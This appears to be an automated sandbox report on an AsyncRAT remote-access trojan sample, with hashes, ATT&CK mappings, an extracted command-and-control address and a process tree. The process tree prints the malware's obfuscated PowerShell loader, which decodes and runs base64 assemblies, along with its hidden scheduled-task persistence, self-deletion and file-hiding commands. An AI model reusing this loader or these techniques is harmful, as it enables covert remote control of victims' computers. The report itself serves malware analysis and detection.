asyncrat | 2d892e65432b58585112e78deec5750652a25249dd4f56e0fd6d47fe7804baf1

Analysis

max time kernel
138s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
24-07-2024 12:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Repo/bin/dll.bat
Size

382KB
MD5

8b1f260a182f74419011f14a8ba21a37
SHA1

48d8da3f5971ebd6b358b6b63491b5e68f099a6c
SHA256

478ca90bdf1d94b880dd18c1fd1a5b6124d4e1c4b77c546df88a0aa992aeb225
SHA512

509a8b51cb3922f9be6c94029abbc4611b1ce438262abc9fef414780e97d7542d214ae42866ccaf540b52e6cfef017abfc00c891643b3b81753c9f4115ad64aa
SSDEEP

6144:UJ+xnM15AXYHvdijZhhzPrJaBuLEQ/npzItPvshlqfyef:f8udDJ5hmPvqlRy

Score

10^/10

asyncrat unam defense_evasion execution rat

Malware Config

Extracted

Family

asyncrat

Version

AsyncRAT

Botnet

unam

windowsignn.theworkpc.com:6606

Mutex

AsyncMutex_5552

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/memory/2004-79-0x000001F5E9940000-0x000001F5E9956000-memory.dmp	family_asyncrat

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3968	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	dll.bat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	startup_str.bat.exe

Executes dropped EXE 2 IoCs

pid	Process
3160	dll.bat.exe
2004	startup_str.bat.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 2 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4568	cmd.exe
3568	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000_Classes\Local Settings	dll.bat.exe

Suspicious behavior: EnumeratesProcesses 17 IoCs

pid	Process
3160	dll.bat.exe
3160	dll.bat.exe
4060	powershell.exe
4060	powershell.exe
4060	powershell.exe
4060	powershell.exe
3968	powershell.exe
3968	powershell.exe
2004	startup_str.bat.exe
2004	startup_str.bat.exe
2004	startup_str.bat.exe
1572	powershell.exe
1572	powershell.exe
1572	powershell.exe
1572	powershell.exe
1572	powershell.exe
2004	startup_str.bat.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3160	dll.bat.exe
Token: SeDebugPrivilege	4060	powershell.exe
Token: SeDebugPrivilege	3968	powershell.exe
Token: SeIncreaseQuotaPrivilege	3968	powershell.exe
Token: SeSecurityPrivilege	3968	powershell.exe
Token: SeTakeOwnershipPrivilege	3968	powershell.exe
Token: SeLoadDriverPrivilege	3968	powershell.exe
Token: SeSystemProfilePrivilege	3968	powershell.exe
Token: SeSystemtimePrivilege	3968	powershell.exe
Token: SeProfSingleProcessPrivilege	3968	powershell.exe
Token: SeIncBasePriorityPrivilege	3968	powershell.exe
Token: SeCreatePagefilePrivilege	3968	powershell.exe
Token: SeBackupPrivilege	3968	powershell.exe
Token: SeRestorePrivilege	3968	powershell.exe
Token: SeShutdownPrivilege	3968	powershell.exe
Token: SeDebugPrivilege	3968	powershell.exe
Token: SeSystemEnvironmentPrivilege	3968	powershell.exe
Token: SeRemoteShutdownPrivilege	3968	powershell.exe
Token: SeUndockPrivilege	3968	powershell.exe
Token: SeManageVolumePrivilege	3968	powershell.exe
Token: 33	3968	powershell.exe
Token: 34	3968	powershell.exe
Token: 35	3968	powershell.exe
Token: 36	3968	powershell.exe
Token: SeIncreaseQuotaPrivilege	3968	powershell.exe
Token: SeSecurityPrivilege	3968	powershell.exe
Token: SeTakeOwnershipPrivilege	3968	powershell.exe
Token: SeLoadDriverPrivilege	3968	powershell.exe
Token: SeSystemProfilePrivilege	3968	powershell.exe
Token: SeSystemtimePrivilege	3968	powershell.exe
Token: SeProfSingleProcessPrivilege	3968	powershell.exe
Token: SeIncBasePriorityPrivilege	3968	powershell.exe
Token: SeCreatePagefilePrivilege	3968	powershell.exe
Token: SeBackupPrivilege	3968	powershell.exe
Token: SeRestorePrivilege	3968	powershell.exe
Token: SeShutdownPrivilege	3968	powershell.exe
Token: SeDebugPrivilege	3968	powershell.exe
Token: SeSystemEnvironmentPrivilege	3968	powershell.exe
Token: SeRemoteShutdownPrivilege	3968	powershell.exe
Token: SeUndockPrivilege	3968	powershell.exe
Token: SeManageVolumePrivilege	3968	powershell.exe
Token: 33	3968	powershell.exe
Token: 34	3968	powershell.exe
Token: 35	3968	powershell.exe
Token: 36	3968	powershell.exe
Token: SeIncreaseQuotaPrivilege	3968	powershell.exe
Token: SeSecurityPrivilege	3968	powershell.exe
Token: SeTakeOwnershipPrivilege	3968	powershell.exe
Token: SeLoadDriverPrivilege	3968	powershell.exe
Token: SeSystemProfilePrivilege	3968	powershell.exe
Token: SeSystemtimePrivilege	3968	powershell.exe
Token: SeProfSingleProcessPrivilege	3968	powershell.exe
Token: SeIncBasePriorityPrivilege	3968	powershell.exe
Token: SeCreatePagefilePrivilege	3968	powershell.exe
Token: SeBackupPrivilege	3968	powershell.exe
Token: SeRestorePrivilege	3968	powershell.exe
Token: SeShutdownPrivilege	3968	powershell.exe
Token: SeDebugPrivilege	3968	powershell.exe
Token: SeSystemEnvironmentPrivilege	3968	powershell.exe
Token: SeRemoteShutdownPrivilege	3968	powershell.exe
Token: SeUndockPrivilege	3968	powershell.exe
Token: SeManageVolumePrivilege	3968	powershell.exe
Token: 33	3968	powershell.exe
Token: 34	3968	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2004	startup_str.bat.exe

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 3052 wrote to memory of 3160	3052	cmd.exe	86
PID 3052 wrote to memory of 3160	3052	cmd.exe	86
PID 3160 wrote to memory of 4060	3160	dll.bat.exe	87
PID 3160 wrote to memory of 4060	3160	dll.bat.exe	87
PID 3160 wrote to memory of 4568	3160	dll.bat.exe	88
PID 3160 wrote to memory of 4568	3160	dll.bat.exe	88
PID 4568 wrote to memory of 5108	4568	cmd.exe	91
PID 4568 wrote to memory of 5108	4568	cmd.exe	91
PID 3160 wrote to memory of 3968	3160	dll.bat.exe	92
PID 3160 wrote to memory of 3968	3160	dll.bat.exe	92
PID 3160 wrote to memory of 2112	3160	dll.bat.exe	97
PID 3160 wrote to memory of 2112	3160	dll.bat.exe	97
PID 2112 wrote to memory of 872	2112	WScript.exe	98
PID 2112 wrote to memory of 872	2112	WScript.exe	98
PID 872 wrote to memory of 2004	872	cmd.exe	100
PID 872 wrote to memory of 2004	872	cmd.exe	100
PID 2004 wrote to memory of 1572	2004	startup_str.bat.exe	101
PID 2004 wrote to memory of 1572	2004	startup_str.bat.exe	101
PID 2004 wrote to memory of 3568	2004	startup_str.bat.exe	103
PID 2004 wrote to memory of 3568	2004	startup_str.bat.exe	103
PID 3568 wrote to memory of 3168	3568	cmd.exe	105
PID 3568 wrote to memory of 3168	3568	cmd.exe	105

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5108	attrib.exe
3168	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Repo\bin\dll.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3052
- C:\Users\Admin\AppData\Local\Temp\Repo\bin\dll.bat.exe
  "C:\Users\Admin\AppData\Local\Temp\Repo\bin\dll.bat.exe" -noprofile -w hidden -ep bypass -command $gingerbread_ZGT90N5CQZ = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\Repo\bin\dll.bat').Split([Environment]::NewLine); foreach ($gingerbread_1KH5QPC857 in $gingerbread_ZGT90N5CQZ) { $gingerbread_IR2OYLS2I9 = [System.Text.RegularExpressions.Regex]::Replace('_0', '0', ' '); $gingerbread_IR2OYLS2I9 = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_IR2OYLS2I9, '_', 'gingerbread_2REG6QYLBJP6'); if ($gingerbread_1KH5QPC857 -match $gingerbread_IR2OYLS2I9) { $gingerbread_5Q959MQ6PK = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_1KH5QPC857, 'gingerbread_2REG6QYLBJP6', ''); $gingerbread_5Q959MQ6PK = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_5Q959MQ6PK, '#', '/');break; }; }; if ($gingerbread_5Q959MQ6PK.Contains('CHOQNLJXHRYDBXUDFLOEFXTOXDPILO')) { $gingerbread_5Q959MQ6PK = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_5Q959MQ6PK, 'CHOQNLJXHRYDBXUDFLOEFXTOXDPILO', ''); } else { exit }; $gingerbread_C3UENP8XTK = [string[]]$gingerbread_5Q959MQ6PK.Split('!'); $gingerbread_43B9R06ZVX = [System.Convert]::FromBase64String($gingerbread_C3UENP8XTK[0]); $gingerbread_L6GT4COAOJ = [System.Reflection.Assembly]::Load($gingerbread_43B9R06ZVX); $gingerbread_75K25BI6VC = $gingerbread_L6GT4COAOJ.EntryPoint; $gingerbread_75K25BI6VC.Invoke($null, $null); $gingerbread_ONPA8XRGXD = [System.Convert]::FromBase64String($gingerbread_C3UENP8XTK[1]); $gingerbread_P0L16O4G72 = [System.Reflection.Assembly]::Load($gingerbread_ONPA8XRGXD); $gingerbread_1JGKLRH6G6 = $gingerbread_P0L16O4G72.EntryPoint; $gingerbread_1JGKLRH6G6.Invoke($null, $null)
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3160
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(3160);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4060
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C ATTRIB +H "C:\Users\Admin\AppData\Local\Temp\Repo\bin\dll.bat.exe" & exit
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:4568
  - - C:\Windows\system32\attrib.exe
      ATTRIB +H "C:\Users\Admin\AppData\Local\Temp\Repo\bin\dll.bat.exe"
      4⤵
      Views/modifies file attributes
      PID:5108
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3968
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:2112
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:872
    - - C:\Users\Admin\AppData\Roaming\startup_str.bat.exe
        
        "C:\Users\Admin\AppData\Roaming\startup_str.bat.exe" -noprofile -w hidden -ep bypass -command $gingerbread_ZGT90N5CQZ = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Roaming\startup_str.bat').Split([Environment]::NewLine); foreach ($gingerbread_1KH5QPC857 in $gingerbread_ZGT90N5CQZ) { $gingerbread_IR2OYLS2I9 = [System.Text.RegularExpressions.Regex]::Replace('_0', '0', ' '); $gingerbread_IR2OYLS2I9 = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_IR2OYLS2I9, '_', 'gingerbread_2REG6QYLBJP6'); if ($gingerbread_1KH5QPC857 -match $gingerbread_IR2OYLS2I9) { $gingerbread_5Q959MQ6PK = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_1KH5QPC857, 'gingerbread_2REG6QYLBJP6', ''); $gingerbread_5Q959MQ6PK = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_5Q959MQ6PK, '#', '/');break; }; }; if ($gingerbread_5Q959MQ6PK.Contains('CHOQNLJXHRYDBXUDFLOEFXTOXDPILO')) { $gingerbread_5Q959MQ6PK = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_5Q959MQ6PK, 'CHOQNLJXHRYDBXUDFLOEFXTOXDPILO', ''); } else { exit }; $gingerbread_C3UENP8XTK = [string[]]$gingerbread_5Q959MQ6PK.Split('!'); $gingerbread_43B9R06ZVX = [System.Convert]::FromBase64String($gingerbread_C3UENP8XTK[0]); $gingerbread_L6GT4COAOJ = [System.Reflection.Assembly]::Load($gingerbread_43B9R06ZVX); $gingerbread_75K25BI6VC = $gingerbread_L6GT4COAOJ.EntryPoint; $gingerbread_75K25BI6VC.Invoke($null, $null); $gingerbread_ONPA8XRGXD = [System.Convert]::FromBase64String($gingerbread_C3UENP8XTK[1]); $gingerbread_P0L16O4G72 = [System.Reflection.Assembly]::Load($gingerbread_ONPA8XRGXD); $gingerbread_1JGKLRH6G6 = $gingerbread_P0L16O4G72.EntryPoint; $gingerbread_1JGKLRH6G6.Invoke($null, $null)
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:2004
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(2004);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1572
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C ATTRIB +H "C:\Users\Admin\AppData\Roaming\startup_str.bat.exe" & exit
        6⤵
        Hide Artifacts: Hidden Files and Directories
        Suspicious use of WriteProcessMemory
        
        PID:3568
        
        C:\Windows\system32\attrib.exe
        
        ATTRIB +H "C:\Users\Admin\AppData\Roaming\startup_str.bat.exe"
        7⤵
        Views/modifies file attributes
        
        PID:3168

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
6b8559593a74eb3b15c53a9fac9a469f

SHA1
13af213d1417edf30c03f76f9242c1975b2e4e74

SHA256
e053d1faabd6b36371f452e79cf70591cf45403a671746136a87198694a8fdb9

SHA512
699b11eda97866809b696c96304bc218d7b72623fd537f83721f36a6c617d854fda7b6f01f7cb0bc0d55189c386e9b9fe6d111bb7c76cce492572b0a9961e974

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8b869815e6cf879e13838c54d41d1210

SHA1
7ad33bbb8a236a4858b0b91c602beb3ab1e1955e

SHA256
c1386775a9b4d0df571d56b080f41042ff869f61fbcc808e12bec08848367035

SHA512
fc3ae7b68ade7843bcaae8f7b5a7383a2b8e9adeeb351c0e8cd06848c0a5469d93cee7c6aa06983afb5422626d40222e95c450a918495ff3767e07a8eeadf08d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Repo\bin\dll.bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rwomjy2n.c0x.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str.bat

Filesize
382KB

MD5
8b1f260a182f74419011f14a8ba21a37

SHA1
48d8da3f5971ebd6b358b6b63491b5e68f099a6c

SHA256
478ca90bdf1d94b880dd18c1fd1a5b6124d4e1c4b77c546df88a0aa992aeb225

SHA512
509a8b51cb3922f9be6c94029abbc4611b1ce438262abc9fef414780e97d7542d214ae42866ccaf540b52e6cfef017abfc00c891643b3b81753c9f4115ad64aa

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str.vbs

Filesize
111B

MD5
371257951e09cb56fafbbda4847cbcb7

SHA1
6d9dab286de574a099f6fe955720a1d87484cea3

SHA256
bb77d873388b64bacd10df67a60d012ed4acc5b03b7fa1070584b7133fa371b3

SHA512
1dffef10d8f25f6df8db17d09b278701211a40497d3aa8749676aeca3426cdc63232135984e74c8abf73442d917df7288b15d93229d8090684f3acba224f9bc1

Download Submit
memory/2004-79-0x000001F5E9940000-0x000001F5E9956000-memory.dmp

Filesize
88KB

Download
memory/2004-78-0x000001F5E9930000-0x000001F5E993C000-memory.dmp

Filesize
48KB

Download
memory/3160-17-0x0000015562150000-0x000001556215A000-memory.dmp

Filesize
40KB

Download
memory/3160-42-0x00007FF901C00000-0x00007FF9026C1000-memory.dmp

Filesize
10.8MB

Download
memory/3160-16-0x00007FF901C00000-0x00007FF9026C1000-memory.dmp

Filesize
10.8MB

Download
memory/3160-18-0x0000015564610000-0x000001556465A000-memory.dmp

Filesize
296KB

Download
memory/3160-15-0x00007FF901C00000-0x00007FF9026C1000-memory.dmp

Filesize
10.8MB

Download
memory/3160-5-0x0000015564290000-0x00000155642B2000-memory.dmp

Filesize
136KB

Download
memory/3160-4-0x00007FF901C03000-0x00007FF901C05000-memory.dmp

Filesize
8KB

Download
memory/3160-80-0x00007FF901C00000-0x00007FF9026C1000-memory.dmp

Filesize
10.8MB

Download
memory/4060-30-0x00007FF901C00000-0x00007FF9026C1000-memory.dmp

Filesize
10.8MB

Download
memory/4060-31-0x00007FF901C00000-0x00007FF9026C1000-memory.dmp

Filesize
10.8MB

Download
memory/4060-29-0x00007FF901C00000-0x00007FF9026C1000-memory.dmp

Filesize
10.8MB

Download
memory/4060-82-0x00007FF901C00000-0x00007FF9026C1000-memory.dmp

Filesize
10.8MB

Download